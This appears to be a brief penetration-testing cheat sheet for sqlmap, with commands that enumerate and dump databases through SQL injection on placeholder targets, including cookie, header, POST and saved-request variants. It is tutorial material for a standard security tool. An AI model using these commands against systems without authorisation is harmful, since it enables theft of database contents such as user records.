
Sqlmap

2017-11-28 19:00:01

sqlmap is an open source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the experienced penetration tester and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. More here: http://sqlmap.org/

Installation

apt-get install -y sqlmap

Docker image with the tool pre-installed

https://hub.docker.com/r/szalek/pentest-tools/

docker pull szalek/pentest-tools
docker run -it szalek/pentest-tools

Target

http://target.localhost/rest/ws-user-account.php?username=szalek

Sqlmap basic

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} -T {TABLE_NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} -T {TABLE_NAME} --dump

with cookie

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs

with header

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs

post

./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" --dbs
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -D shop --tables
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -D shop -T users --dump

post (from a saved request, e.g. copied out of Burp or the browser's network tab)

login_request_dump.txt

POST /login.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.14/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1

email=admin&password=admin

sqlmap -r login_request_dump.txt -p email
sqlmap -r login_request_dump.txt -p password